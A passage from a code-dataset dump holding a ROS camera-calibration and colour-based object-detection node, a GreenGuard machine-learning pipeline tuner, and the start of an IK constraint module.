display_image\n\n\n def calibrate_aruco_cv(self, image, display_image):\n # aruco variables\n ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_4X4_50)\n MARKER_LENGTH = 0.152\n TOP_RIGHT_CORNER_IND = 1\n \"\"\"\n Hand measured\n 18, 0.727 + 0.055 = 0.7814, -0.085\n 12 0.2395 + 0.055 = 0.2945, 0.192\n 42 0.148 + 0.055 = 0.203,-0.318\n \"\"\"\n # Location of top right corner\n XYZ_BY_ID = {\n 18: (0.791, -0.085, 0),\n 12: (0.2945, 0.192, 0),\n 42: (0.203, -0.318, 0)\n }\n\n # Grayscale the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Find aruco markers in the query image, top left corner\n corners, ids, _ = aruco.detectMarkers(\n image=gray,\n dictionary=ARUCO_DICT)\n \n verified_corners = []\n verified_xyz = []\n if ids is None:\n print(\"No aruco markers found\")\n return [], [], display_image\n for i, aruco_id in enumerate(ids.flatten()):\n if aruco_id in XYZ_BY_ID:\n # corners matrix is [aruco marker][0][corner][x,y]]\n verified_corners.append(corners[i][0][TOP_RIGHT_CORNER_IND].flatten())\n verified_xyz.append(XYZ_BY_ID[aruco_id])\n\n # convert to numpy\n verified_corners = np.array(verified_corners)\n verified_xyz = np.array(verified_xyz)\n\n # Outline the aruco markers found in our query image\n display_image = aruco.drawDetectedMarkers(\n image=display_image,\n corners=corners,\n ids=ids)\n\n return verified_xyz, verified_corners, display_image\n\n\n def calibrate_charucoboard(self, image, display_image):\n\n # ChAruco board variables\n CHARUCOBOARD_ROWCOUNT = 5\n CHARUCOBOARD_COLCOUNT = 5\n ARUCO_DICT = aruco.Dictionary_get(aruco.DICT_5X5_50)\n SQUARE_LENGTH = (1+5.0/8) * 0.0254\n MARKER_LENGTH = (1+9.0/32) * 0.0254\n # Create constants to be passed into OpenCV and Aruco methods\n print(\n CHARUCOBOARD_COLCOUNT > 1,\n CHARUCOBOARD_ROWCOUNT > 1,\n SQUARE_LENGTH > MARKER_LENGTH\n )\n CHARUCO_BOARD = aruco.CharucoBoard_create(\n squaresX=CHARUCOBOARD_COLCOUNT,\n squaresY=CHARUCOBOARD_ROWCOUNT,\n squareLength=SQUARE_LENGTH,\n markerLength=MARKER_LENGTH,\n dictionary=ARUCO_DICT)\n\n # Create the arrays and variables we'll use to store info like corners and IDs from images processed\n corners_all = [] # Corners discovered in all images processed\n ids_all = [] # Aruco ids corresponding to corners discovered\n image_size = None # Determined at runtime\n\n # Grayscale the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Find aruco markers in the query image\n corners, ids, _ = aruco.detectMarkers(\n image=gray,\n dictionary=ARUCO_DICT)\n\n # Outline the aruco markers found in our query image\n display_image = aruco.drawDetectedMarkers(\n image=display_image,\n corners=corners)\n\n # Get charuco corners and ids from detected aruco markers\n response, charuco_corners, charuco_ids = aruco.interpolateCornersCharuco(\n markerCorners=corners,\n markerIds=ids,\n image=gray,\n board=CHARUCO_BOARD)\n\n # If a Charuco board was found, let's collect image/corner points\n # Requiring at least 20 squares\n if response > 5:\n # Add these corners and ids to our calibration arrays\n corners_all.append(charuco_corners)\n ids_all.append(charuco_ids)\n\n # Draw the Charuco board we've detected to show our calibrator the board was properly detected\n display_image = aruco.drawDetectedCornersCharuco(\n image=display_image,\n charucoCorners=charuco_corners,\n charucoIds=charuco_ids)\n\n return [], corners_all, display_image\n\n else:\n print(\"Not able to detect a charuco board in image\")\n return [], [], display_image\n\n\n def calibrate_all(self, ros_image, set_params=True):\n # Convert into OpenCV image.\n image = self.bridge.imgmsg_to_cv2(ros_image, \"bgr8\")\n display_image = image.copy()\n xyz_list = []\n corners_list = []\n\n calibration_funcs = [\n self.calibrate_checkerboard,\n self.calibrate_aruco_cv\n ]\n for calibration_func in calibration_funcs:\n xyz, corners, display_image = calibration_func(image, display_image)\n xyz_list.extend(xyz)\n corners_list.extend(corners)\n\n # Convert to np\n xyz_list = np.array(xyz_list)\n corners_list = np.array(corners_list)\n \n if set_params:\n print(xyz_list)\n print(corners_list)\n self.locate_camera(xyz_list, corners_list)\n\n return display_image\n\n\n #\n # Determine the camera position/orientation\n #\n # Note in the vision world, folks are interested in where objects\n # are relative to the camera. So we will need to invert the\n # orientation/position to get the camera w.r.t. world (which is our\n # object).\n #\n def locate_camera(self, xyz, corners): \n # Compute the world frame w.r.t. camera.\n ok, rvec, tvec = cv2.solvePnP(xyz, corners, self.K, self.D)\n if not ok:\n print(\"Problem locating the camera!\")\n return\n (self.R_world_wrt_cam, _) = cv2.Rodrigues(rvec)\n self.x_world_wrt_cam = tvec\n\n # Convert into the camera frame w.r.t. world.\n self.R_cam_wrt_world = self.R_world_wrt_cam.transpose()\n self.x_cam_wrt_world = - np.matmul(self.R_cam_wrt_world, self.x_world_wrt_cam)\n print(\"actual\", self.x_cam_wrt_world)\n #self.x_cam_wrt_world = np.array([[2], [-0.125], [1.18]])\n\n \"\"\"\n Hand measured\n checkerboard, 0.7735 + 0.055 = 0.8285, 0.3165\n 18, 0.727 + 0.055 = 0.7814, -0.085\n 12 0.2395 + 0.055 = 0.2945, 0.192\n 42 0.148 + 0.055 = 0.203,-0.318\n \"\"\"\n\n # Report.\n print(\"r cam wrt world\")\n print(self.R_cam_wrt_world)\n print(\"cam loc should be:\", [1.335, 0.125, 1.18])\n print(\"Cam loc (x, y, z relative to 0,0,0): %6.3f, %6.3f, %6.3f\" \n % tuple(self.x_cam_wrt_world.reshape(3)))\n\n self.check_calibration(corners)\n\n #\n # Undistort\n #\n # Compute the normalized (image) coordinates from the pixels\n #\n def undistort(self, uv, obj_height=0.0):\n # Map to the normalized (image) coordinates. As above, the API\n # assume a set of lists of points, so reshape accordingly.\n #print(uv.reshape(1,-1,2), uv.reshape(1,-1,2).shape)\n #raise Exception\n xybar = cv2.undistortPoints(uv.reshape(1,-1,2).astype(float), self.K, self.D).reshape(2)\n #print('xbar, ybar:', xybar)\n\n # Now map into the world. Here I am assuming zw = 0...\n Rc = self.R_cam_wrt_world\n xc = self.x_cam_wrt_world.reshape(3)\n\n lam = -xc[2] / (Rc[2][0]*xybar[0] + Rc[2][1]*xybar[1] + Rc[2][2])\n xw = lam*(Rc[0][0]*xybar[0] + Rc[0][1]*xybar[1] + Rc[0][2]) + xc[0]\n yw = lam*(Rc[1][0]*xybar[0] + Rc[1][1]*xybar[1] + Rc[1][2]) + xc[1]\n\n # Adjust for the height of the object\n cam_height = self.x_cam_wrt_world[2]\n factor = obj_height / cam_height\n obj_to_cam_xy = (\n self.x_cam_wrt_world[0] - xw,\n self.x_cam_wrt_world[1] - yw\n )\n xw += obj_to_cam_xy[0] * factor\n yw += obj_to_cam_xy[1] * factor\n\n # hacky x axis correction for bloating\n xw += 0.025 / max(1, (xw - 0.10) * 100) + 0.01\n return (xw, yw)\n\n def undistort_cap(self, uv):\n return self.undistort(uv, CAP_HEIGHT)\n\n def undistort_band(self, uv):\n return self.undistort(uv, BAND_HEIGHT)\n\n def undistort_rim(self, uv):\n return self.undistort(uv, RIM_HEIGHT)\n\n def check_calibration(self, corners):\n # Pick a (u,v) pair. I used the top-left corner for\n # testing, which is (-3.5, 2.5) * 0.0254 * 29 / 32\n uv = corners[0]\n xw, yw = self.undistort(uv)\n X_CENTER = 0.8285\n Y_CENTER = -0.3165\n # Check the location in number of squares...\n n_x = (xw - X_CENTER) / self.board.dim\n n_y = (yw - Y_CENTER) / self.board.dim\n print('location of top left corner in number of squares', [n_x, n_y],\n 'we expect -1.5 and 1')\n\n\n#\n# Detector Node Class\n#\n\nclass Detector:\n\n def __init__(self):\n # Instantiate a calibrator\n self.checkCalibrator = CheckerboardCalibrator()\n\n # Set up the OpenCV Bridge.\n self.bridge = cv_bridge.CvBridge()\n\n # Pick the topic names. The source image topic can be\n # remapped in the command line. The '~' places the output\n # image topic will be under the node name.\n source_topic = rospy.resolve_name(\"/cam_feed/image_rect_color\")\n output_topic = rospy.resolve_name(\"~image\")\n calibration_topic = rospy.resolve_name(\"~calibration_image\")\n debug_topic = rospy.resolve_name(\"~debug_image\")\n activation_topic = rospy.resolve_name(\"/activation\")\n cap_output_topic = rospy.resolve_name(\"/bottle_cap_dets\")\n band_output_topic = rospy.resolve_name(\"/bottle_band_det\")\n rim_output_topic = rospy.resolve_name(\"/bottle_rim_det\")\n target_output_topic = rospy.resolve_name(\"/target_det\")\n\n this_file_dir = os.path.dirname(os.path.abspath(__file__))\n ASSETS_PATH = os.path.join(this_file_dir, \"../assets/\")\n\n self.green_classifier = load(ASSETS_PATH + '134green.joblib')\n self.pink_classifier = load(ASSETS_PATH + '134pink.joblib')\n self.orange_classifier = load(ASSETS_PATH + '134orange.joblib')\n\n first_image = rospy.wait_for_message(source_topic, Image)\n self.checkCalibrator.calibrate_all(first_image)\n\n # Subscribe to the source topic. Using a queue size of one\n # means only the most recent message is stored for the next\n # subscriber callback.\n rospy.Subscriber(source_topic,\n sensor_msgs.msg.Image,\n self.process,\n queue_size=1)\n\n # Publish to the output topic.\n self.publisher = rospy.Publisher(output_topic,\n sensor_msgs.msg.Image,\n queue_size=1)\n \n # Publish to the activation topic.\n self.activation_publisher = rospy.Publisher(activation_topic, Activation, queue_size=1)\n\n # Publish to the cap output topic.\n self.cap_publisher = rospy.Publisher(cap_output_topic,\n Detection,\n queue_size=1)\n\n # Publish to the band output topic:\n self.band_publisher = rospy.Publisher(band_output_topic,Detection,queue_size=1)\n\n # Publish to the rim output topic:\n self.rim_publisher = rospy.Publisher(rim_output_topic,Detection,queue_size=1)\n\n self.target_publisher = rospy.Publisher(target_output_topic,Detection,queue_size=1)\n\n # Publish to the calibration topic.\n self.calibration_publisher = rospy.Publisher(calibration_topic,\n sensor_msgs.msg.Image,\n queue_size=1)\n\n # Publish to the debug topic.\n self.debug_publisher = rospy.Publisher(debug_topic,\n sensor_msgs.msg.Image,\n queue_size=1)\n\n # Report.\n rospy.loginfo(\"Detector configured with:\")\n rospy.loginfo(\"Image source topic: \" + source_topic)\n rospy.loginfo(\"Image output topic: \" + output_topic)\n rospy.loginfo(\"Tplink Rect output topic: \" + cap_output_topic)\n\n def treeThreshold(self, image, classifier):\n shp = image.shape\n pixels = image.reshape(-1, 3)\n out = classifier.predict(pixels)\n out = out.reshape(shp[0], shp[1], 1)\n return out\n\n def test_calibration(self, ros_image):\n #calibration_image = self.checkCalibrator.calibrate_charucoboard(ros_image)\n calibration_image = self.checkCalibrator.calibrate_all(ros_image, set_params=False)\n self.calibration_publisher.publish(\n self.bridge.cv2_to_imgmsg(calibration_image, \"bgr8\"))\n\n def detect(self, image, classifier, min_size, max_size, show_mask=False):\n mask = self.treeThreshold(image, classifier)[:,:,0]\n # use adaptive thresholding for saturation\n blur_v = cv2.GaussianBlur(image[:, :, 1],(3, 3),0)\n #blur_v = image[:, :, 1]\n # ret, th = cv2.threshold(blur_v, 255, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n # mask = np.minimum(mask, th)\n contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n if show_mask:\n ms = mask.shape\n mask[:, ms[1]/2:(ms[1]/2+2)] = 255\n mask[ms[0]/2:(ms[0]/2+2),:] = 255\n\n v_image = image[:,:,2]\n # Otsu's thresholding\n ret2,th2 = cv2.threshold(v_image,255,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n # Otsu's thresholding after Gaussian filtering\n blur = cv2.GaussianBlur(v_image,(3, 3),0)\n ret3,th3 = cv2.threshold(blur,255,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n print(image[ms[0]/2 - 2:ms[0]/2+2, ms[1]/2 - 2:ms[1]/2+2])\n #print(v_image[ms[0]/2 - 2:ms[0]/2+2, ms[1]/2 - 2:ms[1]/2+2])\n print(\"contour areas:\", sorted([cv2.contourArea(c) for c in contours], reverse=True))\n \n #self.debug_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n self.debug_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n try:\n #blob = max(contours, key=lambda el: cv2.contourArea(el))\n # try all blobs since we have a size range\n for blob in contours:\n if cv2.contourArea(blob) > min_size and cv2.contourArea(blob) < max_size:\n M = cv2.moments(blob)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n return mask, center, M\n return mask, None, None\n\n except ValueError:\n return mask, None, None\n\n def process(self, ros_image):\n self.test_calibration(ros_image)\n # Convert into OpenCV image.\n cv_img = self.bridge.imgmsg_to_cv2(ros_image, \"bgr8\")\n\n # Convert to rgb scale.\n rgb_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n\n hsv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2HSV)\n # convert from 360, 100, 100 to 180, 255, 255)\n '''tols = np.array([2, 30, 15]) * 2\n\n cap_picked_color = (200.0 / 2, 75 * 2.55, 55 * 2.55)\n cap_lower = (picked_color[0] - tols[0], picked_color[1] - tols[1], picked_color[2] - tols[2])\n cap_upper = (picked_color[0] + tols[0], picked_color[1] + tols[1], picked_color[2] + tols[2])\n cap_mask = cv2.inRange(hsv_img,lower,upper)\n ms = cap_mask.shape'''\n # mask[:, ms[1]/2] = 255\n # mask[ms[0]/2,:] = 255\n # # print(\"starting\")\n # print(hsv_img[ms[0]/2 - 5:ms[0]/2+5, ms[1]/2 - 5:ms[1]/2+5])\n \n #exit(1)\n #print(np.max(mask), np.min(mask))\n #mask = mask[:ms[0]/2, :ms[1]/2]\n\n '''cap_tols = np.array([5, 30, 15]) * 2\n #cap_picked_color = (200.0 / 2, 75 * 2.55, 55 * 2.55) # old values\n cap_picked_color = (185.0 / 2, 75 * 2.55, 55 * 2.55)\n cap_lower = (cap_picked_color[0] - cap_tols[0], cap_picked_color[1] - cap_tols[1], cap_picked_color[2] - cap_tols[2])\n cap_upper = (cap_picked_color[0] + cap_tols[0], cap_picked_color[1] + cap_tols[1], cap_picked_color[2] + cap_tols[2])\n cap_mask = cv2.inRange(hsv_img,cap_lower,cap_upper)\n cap_ms = cap_mask.shape\n\n band_picked_color = (210 / 2, 85 * 2.55, 50 * 2.55)\n band_tols = np.array([5,20,20]) * 2\n band_lower = (band_picked_color[0] - band_tols[0], band_picked_color[1] - band_tols[1], band_picked_color[2] - band_tols[2])\n band_upper = (band_picked_color[0] + band_tols[0], band_picked_color[1] + band_tols[1], band_picked_color[2] + band_tols[2])\n band_mask = cv2.inRange(hsv_img,band_lower,band_upper)\n band_ms = band_mask.shape\n\n #self.calibration_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n cap_contours, _ = cv2.findContours(cap_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n band_contours, _ = cv2.findContours(band_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #print(\"contours:\", contours)\n found = False\n try:\n band_blob = max(band_contours, key=lambda el: cv2.contourArea(el))\n print(\"largest band blob: \" + str(cv2.contourArea(band_blob)))\n if cv2.contourArea(band_blob) > 100: # magic number for the size of the band\n M = cv2.moments(band_blob)\n detection_type = \"band\"\n found = True\n except ValueError:\n pass\n\n try:\n cap_blob = max(cap_contours, key=lambda el: cv2.contourArea(el))\n print(\"largest cap blob: \" + str(cv2.contourArea(cap_blob)))\n if cv2.contourArea(cap_blob) > 50: # magic number for the size of the cap\n M = cv2.moments(cap_blob)\n detection_type = \"cap\"\n found = True\n except ValueError:\n pass\n '''\n\n #self.calibration_publisher.publish(self.bridge.cv2_to_imgmsg(mask, '8UC1'))\n #cap_contours, _ = cv2.findContours(cap_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #band_contours, _ = cv2.findContours(band_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n #print(\"contours:\", contours)\n #if len(cap_contours) == 0:\n # print(\"no cap contours found\")\n # return\n #blob = max(cap_contours, key=lambda el: cv2.contourArea(el))\n #M = cv2.moments(blob)\n #center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n '''if found and M is not None:\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n cv2.circle(cv_img, center, 2, (0,0,255), -1)\n uv = np.array((center))\n xw, yw = self.checkCalibrator.undistort(uv)\n if detection_type == \"cap\":\n zw = CAP_HEIGHT\n elif detection_type == \"band\":\n zw = BAND_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('x, y, z:', xw[0], yw[0], zw)\n if detection_type == \"cap\":\n self.cap_publisher.publish(detection_msg)\n elif detection_type == \"band\":\n self.band_publisher.publish(detection_msg)\n '''\n\n # TODO REVISIT ACTIVATION\n # on_picked_color = (155 / 2, 53 * 2.55, 48 * 2.55)\n # on_tols = (10, 40, 40)\n # on_mask, on_center, _ = self.detect(hsv_img, on_picked_color, on_tols, 100, 5000)\n\n # active_msg = Activation()\n # if on_center is None:\n # print(\"robot is active!\")\n # active_msg.active = True\n # else:\n # active_msg.active = False\n # self.activation_publisher.publish(active_msg)\n\n \n cap_mask, cap_center, _ = self.detect(\n hsv_img, self.green_classifier, 90, 600,\n show_mask=True)\n\n # old blue\n # band_picked_color = (210 / 2, 85 * 2.55, 50 * 2.55)\n # band_tols = (10,40,40)\n # hot pink\n band_mask, band_center, band_moments = self.detect(\n hsv_img, self.pink_classifier, 200, 1500,\n show_mask=False)\n\n rim_mask, rim_center, rim_moments = self.detect(\n hsv_img, self.pink_classifier, 10, 100,\n show_mask=False)\n\n target_mask, target_center, target_moments = self.detect(\n hsv_img, self.orange_classifier, 200, 100000,\n show_mask=False)\n\n \"\"\"\n Other colors:\n hot pink: 165, 177 (160-180), 142 ( 120-150)\n cap_picked_color = (165, 140, 142)\n cap_tols = (10, 255, 40)\n hot orange: 16, 177 ( 170- 195), 163 (145 - 170)\n\n cap_picked_color = (16, 160, 160)\n cap_tols = (5, 255, 25)\n deep light green 82, 89 ( 75-95), 130 ( 110 - 130)\n light dark green: 82, 155 ( 130-160), 103 ( 90 - 110)\n \"\"\"\n\n if cap_center is not None:\n cv2.circle(cv_img, cap_center, 2, (0, 0, 255), -1)\n uv = np.array((cap_center))\n xw, yw = self.checkCalibrator.undistort_cap(uv)\n # actually 0.2, but we lower it for the sake of the robot\n zw=CAP_HEIGHT - 0.04\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('cap x, y, z:', xw[0], yw[0], zw)\n self.cap_publisher.publish(detection_msg)\n if band_center is not None:\n cv2.circle(cv_img, band_center, 2, (0,0,255), -1)\n uv = np.array((band_center))\n xw, yw = self.checkCalibrator.undistort_band(uv)\n zw=BAND_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('band x, y, z:', xw[0], yw[0], zw)\n self.band_publisher.publish(detection_msg)\n if rim_center is not None:\n cv2.circle(cv_img, rim_center, 2, (0,0,255), -1)\n uv = np.array((rim_center))\n xw, yw = self.checkCalibrator.undistort_rim(uv)\n zw=RIM_HEIGHT\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('rim x, y, z:', xw[0], yw[0], zw)\n self.rim_publisher.publish(detection_msg)\n if target_center is not None:\n cv2.circle(cv_img, target_center, 2, (0,0,255), -1)\n uv = np.array((target_center))\n xw, yw = self.checkCalibrator.undistort_rim(uv)\n zw=0\n detection_msg = Detection()\n detection_msg.position = Vector3()\n detection_msg.position.x = xw\n detection_msg.position.y = yw\n detection_msg.position.z = zw\n print('target x, y, z:', xw[0], yw[0], zw)\n self.target_publisher.publish(detection_msg)\n\n #if M is not None:\n # center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n # cv2.circle(cv_img, center, 2, (0,0,255), -1)\n #uv = np.array((center))\n #xw, yw = self.checkCalibrator.undistort(uv)\n #zw = 0.16#8 * 0.0254\n #detection_msg = Detection()\n #detection_msg.position = Vector3()\n #detection_msg.position.x = xw\n #detection_msg.position.y = yw\n #detection_msg.position.z = zw\n #print('x, y, z:', xw[0], yw[0], zw)\n #self.tplink_publisher.publish(detection_msg)\n\n '''\n # Run the detector.\n objects = []#self.detector...\n\n # For the fun of it. This should also be published!\n if len(objects) > 0:\n print(objects)\n\n # Indicate the objects in the image.\n for (x,y,w,h) in objects:\n cv2.rectangle(cv_img,(x,y),(x+w,y+h),(255,0,0),2)\n detection_msg = Rect()\n detection_msg.x = x + w/2\n detection_msg.y = y + h/2\n detection_msg.width = w\n detection_msg.height = h\n self.cap_publisher.publish(detection_msg)\n '''\n\n # Convert back into a ROS image and republish (for debugging).\n self.publisher.publish(\n self.bridge.cv2_to_imgmsg(cv_img, \"bgr8\"))\n\n\n#\n# Main Code\n#\nif __name__ == \"__main__\":\n # Prepare the node. You can override the name using the\n # 'rosrun .... __name:=something' convention.\n rospy.init_node('detector')\n\n # Instantiate the Detector object.\n detector = Detector()\n\n # Continually process until shutdown.\n rospy.loginfo(\"Continually processing latest pending images...\")\n rospy.spin()\n\n # Report completion.\n rospy.loginfo(\"Done!\")\n","sub_path":"boogaloo/scripts/pydetectobject.py","file_name":"pydetectobject.py","file_ext":"py","file_size_in_byte":29352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"462213765","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport cloudpickle\nimport numpy as np\nfrom btb import HyperParameter\nfrom btb.tuning import GP\nfrom mlblocks import MLPipeline\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.metrics import accuracy_score, mean_absolute_error, mean_squared_error, r2_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nLOGGER = logging.getLogger(__name__)\n\n\nPIPELINES_DIR = os.path.join(os.path.dirname(__file__), 'pipelines')\n\nMETRICS = {\n 'accuracy': (accuracy_score, False),\n 'r2': (r2_score, False),\n 'mse': (mean_squared_error, True),\n 'mae': (mean_absolute_error, True)\n}\n\n\nclass GreenGuardPipeline(object):\n\n template = None\n fitted = False\n score = None\n\n _cv_class = None\n _metric = None\n _cost = False\n _tuner = None\n _pipeline = None\n\n def _get_cv(self, stratify, cv_splits, shuffle, random_state):\n if stratify:\n cv_class = StratifiedKFold\n else:\n cv_class = KFold\n\n return cv_class(n_splits=cv_splits, shuffle=shuffle, random_state=random_state)\n\n def _load_template(self, template):\n if not os.path.isfile(template):\n template = os.path.join(PIPELINES_DIR, template + '.json')\n\n with open(template, 'r') as template_file:\n return json.load(template_file)\n\n def _load_mlpipeline(self, template):\n if not isinstance(template, dict):\n template = self._load_template(template)\n\n self.template = template\n\n return MLPipeline.from_dict(template)\n\n def __init__(self, template, metric, cost=False, hyperparameters=None,\n stratify=True, cv_splits=5, shuffle=True, random_state=0):\n\n self._cv = self._get_cv(stratify, cv_splits, shuffle, random_state)\n\n if isinstance(metric, str):\n metric, cost = METRICS[metric]\n\n self._metric = metric\n self._cost = cost\n\n self._pipeline = self._load_mlpipeline(template)\n\n if hyperparameters:\n self._pipeline.set_hyperparameters(hyperparameters)\n\n def get_hyperparameters(self):\n return self._pipeline.get_hyperparameters()\n\n def set_hyperparameters(self, hyperparameters):\n self._pipeline.set_hyperparameters(hyperparameters)\n self.fitted = False\n\n @staticmethod\n def _clone_pipeline(pipeline):\n return MLPipeline.from_dict(pipeline.to_dict())\n\n def _is_better(self, score):\n if self._cost:\n return score < self.score\n\n return score > self.score\n\n def _get_tunables(self):\n tunables = []\n tunable_keys = []\n for block_name, params in self._pipeline.get_tunable_hyperparameters().items():\n for param_name, param_details in params.items():\n key = (block_name, param_name)\n param_type = param_details['type']\n param_type = 'string' if param_type == 'str' else param_type\n\n if param_type == 'bool':\n param_range = [True, False]\n else:\n param_range = param_details.get('range') or param_details.get('values')\n\n value = HyperParameter(param_type, param_range)\n tunables.append((key, value))\n tunable_keys.append(key)\n\n return tunables, tunable_keys\n\n def _score_pipeline(self, pipeline, X, y, tables):\n scores = []\n\n for fold, (train_index, test_index) in enumerate(self._cv.split(X, y)):\n LOGGER.debug('Scoring fold %s', fold)\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n\n pipeline = self._clone_pipeline(pipeline)\n pipeline.fit(X_train, y_train, **tables)\n\n predictions = pipeline.predict(X_test, **tables)\n score = self._metric(y_test, predictions)\n\n LOGGER.debug('Fold fold %s score: %s', fold, score)\n scores.append(score)\n\n return np.mean(scores)\n\n def _to_dicts(self, hyperparameters):\n\n params_tree = defaultdict(dict)\n for (block, hyperparameter), value in hyperparameters.items():\n if isinstance(value, np.integer):\n value = int(value)\n\n elif isinstance(value, np.floating):\n value = float(value)\n\n elif isinstance(value, np.ndarray):\n value = value.tolist()\n\n elif value == 'None':\n value = None\n\n params_tree[block][hyperparameter] = value\n\n return params_tree\n\n def _to_tuples(self, params_tree, tunable_keys):\n param_tuples = defaultdict(dict)\n for block_name, params in params_tree.items():\n for param, value in params.items():\n key = (block_name, param)\n if key in tunable_keys:\n param_tuples[key] = 'None' if value is None else value\n\n return param_tuples\n\n def _get_tuner(self):\n tunables, tunable_keys = self._get_tunables()\n tuner = GP(tunables)\n\n # Inform the tuner about the score that the default hyperparmeters obtained\n param_tuples = self._to_tuples(self._pipeline.get_hyperparameters(), tunable_keys)\n tuner.add(param_tuples, self.score)\n\n return tuner\n\n def tune(self, X, y, tables, iterations=10):\n tables.setdefault('entityset', None)\n if not self._tuner:\n LOGGER.info('Scoring the default pipeline')\n self.score = self._score_pipeline(self._pipeline, X, y, tables)\n LOGGER.info('Default Pipeline score: %s', self.score)\n\n self._tuner = self._get_tuner()\n\n for i in range(iterations):\n LOGGER.info('Scoring pipeline %s', i + 1)\n\n params = self._tuner.propose(1)\n param_dicts = self._to_dicts(params)\n\n candidate = self._clone_pipeline(self._pipeline)\n candidate.set_hyperparameters(param_dicts)\n\n try:\n score = self._score_pipeline(candidate, X, y, tables)\n\n LOGGER.info('Pipeline %s score: %s', i + 1, score)\n\n if self._is_better(score):\n self.score = score\n self.set_hyperparameters(param_dicts)\n\n self._tuner.add(params, score)\n\n except Exception:\n failed = '\\n'.join('{}: {}'.format(k, v) for k, v in params.items())\n LOGGER.exception(\"Caught an exception scoring pipeline %s with params:\\n%s\",\n i + 1, failed)\n\n def fit(self, X, y, tables):\n tables.setdefault('entityset', None)\n self._pipeline.fit(X, y, **tables)\n self.fitted = True\n\n def predict(self, X, tables):\n if not self.fitted:\n raise NotFittedError()\n\n tables.setdefault('entityset', None)\n return self._pipeline.predict(X, **tables)\n\n def save(self, path):\n with open(path, 'wb') as pickle_file:\n cloudpickle.dump(self, pickle_file)\n\n @classmethod\n def load(cls, path):\n with open(path, 'rb') as pickle_file:\n return cloudpickle.load(pickle_file)\n","sub_path":"greenguard/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32144539","text":"__author__ = 'gleicher'\r\n\r\n\"\"\"\r\nImplements constraints for a specific unit of time - so it can be used for IK\r\n\r\nfor spacetime, you need to associate it with a specific time frame\r\n\r\ncan have multiple scalar constraints, so it outputs 2 lists (eqs, ineqs)\r\nnote that this is the same as Robot.constraint\\\r\n\r\nnote: for a while, there was an idea to make these work as objective terms\r\nas well, however, this got lost (and probably wasn't an important idea)\r\n\"\"\"\r\n\r\nimport adInterface as AD\r\nimport numpy as N\r\nimport math\r\n\r\nclass Constraint:\r\n def __init__(self, eqs, ineqs, noZ):\r\n self.noZ = noZ\r\n self.eqs = eqs\r\n self.ineqs = ineqs\r\n #CB - define bounds as lists (these set defaults and should be overridden by each subclass of Constraint)\r\n self.cUBounds = []\r\n self.cLBounds = []\r\n self.numConstraints = 0 # a Constraint object can actually have more than 1 constraint\r\n\r\n # do we use point information?\r\n self.usesPoints = 1\r\n self.usesPointDerivatives = 0\r\n # do we use state?\r\n self.usesState = 1\r\n self.usesStateDerivatives = 0\r\n\r\n pass\r\n\r\n def getConstInfo(self):\r\n return self.numConstraints, self.cUBounds, self.cLBounds\r\n\r\n def constraint(self, **kwargs):\r\n raise NotImplemented\r\n\r\nclass Nail(Constraint):\r\n \"\"\"\r\n simplest possible constraint - puts a point at a specific position\r\n \"\"\"\r\n def __init__(self, _pointID, _position, _noZ):\r\n Constraint.__init__(self,True,False,_noZ)\r\n self.pointID = _pointID\r\n self.position = _position\r\n #CB - added code to set bounds and numConstraints (for equality uBound == lBound)\r\n if self.noZ:\r\n self.cUBounds = [0,0]\r\n else:\r\n self.cUBounds = [0,0,0]\r\n self.cLBounds = self.cUBounds\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, points, **kwargs):\r\n if self.noZ:\r\n return [points[self.pointID][0]-self.position[0],points[self.pointID][1]-self.position[1]], []\r\n else:\r\n return [points[self.pointID][0]-self.position[0],points[self.pointID][1]-self.position[1],points[self.pointID][2]-self.position[2]], []\r\n\r\n def __repr__(self):\r\n return \"\" % (self.pointID, self.position[0], self.position[1], self.position[2])\r\n\r\nclass alignAxis(Constraint):\r\n def __init__(self, _pt, _ax, _vec):\r\n Constraint.__init__(self,1,0,False)\r\n 